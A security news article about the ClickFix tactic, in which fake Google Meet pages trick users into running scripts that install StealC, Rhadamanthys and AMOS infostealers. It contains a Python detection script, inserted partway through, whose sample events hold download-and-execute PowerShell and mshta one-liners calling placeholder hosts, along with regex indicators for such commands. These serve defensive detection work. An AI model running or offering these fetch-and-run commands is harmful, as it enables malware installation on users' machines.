Users of the Google Meet video communication service have been targeted by cyber crooks using the ClickFix tactic to infect them with information-stealing malware.
Fake Google Meet video conference page with malicious ClickFix pop-up (Source: Sekoia)
“The ClickFix tactic deceives users into downloading and running malware on their machines without involving a web browser for download or requiring manual file execution,” Sekoia researchers explained.
“It makes it possible to bypass web browser security features, such as Google Safe Browsing, and to appear less suspicious to unsuspecting corporate and individual users.”
The ClickFix tactic
The ClickFix tactic is becoming popular with many other threat actors and presents a grave danger to both consumers and enterprises. Users usually land on the compromised websites by following links from phishing emails or search engine results, and if they are unfamiliar with this particular trick, they are likely to get infected.
This social engineering tactic was named by Proofpoint researchers, who flagged its use on compromised websites showing fake browser alerts.
The alerts usually warn users that the webpage or document cannot be displayed correctly by the browser until they click the “Fix It” button and follow the outlined steps, which result in the user unknowingly copying and executing malicious code that installs malware.
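The copy-and-run step is what a defender can look for in endpoint telemetry. The following is an added example, not code from Sekoia or from this article: it scores constructed Sysmon-style process-creation records (JSON lines) for a script interpreter launched from explorer.exe with a download-and-execute command line. It assumes the commonly documented ClickFix delivery path of pasting the command into the Windows Run dialog or a PowerShell console; the field names, indicator patterns and sample events are my own.

```python
import json
import re

# Interpreters a pasted ClickFix one-liner is typically handed to (assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Command-line traits of a pasted one-liner, each mapped to an indicator label.
INDICATORS = [
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|bitsadmin)\b", re.I), "download cradle"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline execution"),
    (re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I), "remote HTA"),
]

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()  # last component of a Windows path
def score_event(ev: dict) -> list[str]:
    """Return the indicator labels matched by one process-creation event."""
    if basename(ev.get("Image", "")) not in INTERPRETERS:
        return []
    hits = [label for rx, label in INDICATORS if rx.search(ev.get("CommandLine", ""))]
    # explorer.exe as parent means the user launched it (Run dialog or console),
    # which is the ClickFix tell; only meaningful together with other hits.
    if hits and basename(ev.get("ParentImage", "")) == "explorer.exe":
        hits.append("user-launched from explorer.exe")
    return hits

def detect(jsonl: str) -> dict:
    """Map ProcessId -> indicator list for every flagged event in JSON-lines input."""
    flagged = {}
    for line in jsonl.splitlines():
        ev = json.loads(line)
        hits = score_event(ev)
        if hits:
            flagged[ev["ProcessId"]] = hits
    return flagged

# Constructed sample events shaped like Sysmon Event ID 1; not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": "4242", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://meet.example.invalid/check)"'},
    {"ProcessId": "4260", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},  # user simply opened a console
    {"ProcessId": "4288", "Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},  # scheduled task
    {"ProcessId": "4311", "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://verify.example.invalid/captcha.hta"},
])
```

Running `detect(SAMPLE_EVENTS)` flags only the two explorer-spawned events with download-and-run command lines; the plain console launch and the scheduled script are left alone.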
Since February 2024, Sekoia and other cybersecurity companies have flagged a number of malware delivery campaigns using the same social engineering tactic. Sometimes the call to action is “Fix the problem”, other times it is “Prove that you’re human” (on fake CAPTCHA pages).
The fake alerts and requests for verification have been “parked” on compromised sites and Facebook pages, customized to target Google Meet users, GitHub users, companies in the transportation and logistics sector, users looking for video streaming services via Google, and others.
Lures may differ
Sekoia analysts managed to associate the ClickFix cluster impersonating Google Meet with two cybercrime groups that are sub-teams of the cryptocurrency scam teams “Marko Polo” and “CryptoLove”, which are part of the Russian-speaking cybercrime ecosystem.
The script the users unknowingly run delivers the StealC and Rhadamanthys malware to Windows users, and the AMOS stealer to those using macOS. When users get saddled with the malware, a message is sent to Telegram bots so that the crooks may track compromises.
Sekoia researchers say that both groups use the same ClickFix template that impersonates Google Meet, which points to them sharing materials and infrastructure (which is likely managed by a third party).
An analysis of the malware distribution infrastructure shows that the attackers could also be targeting users looking for games, PDF readers, Web3 web browsers and messaging apps, as well as users of the Zoom videoconferencing app.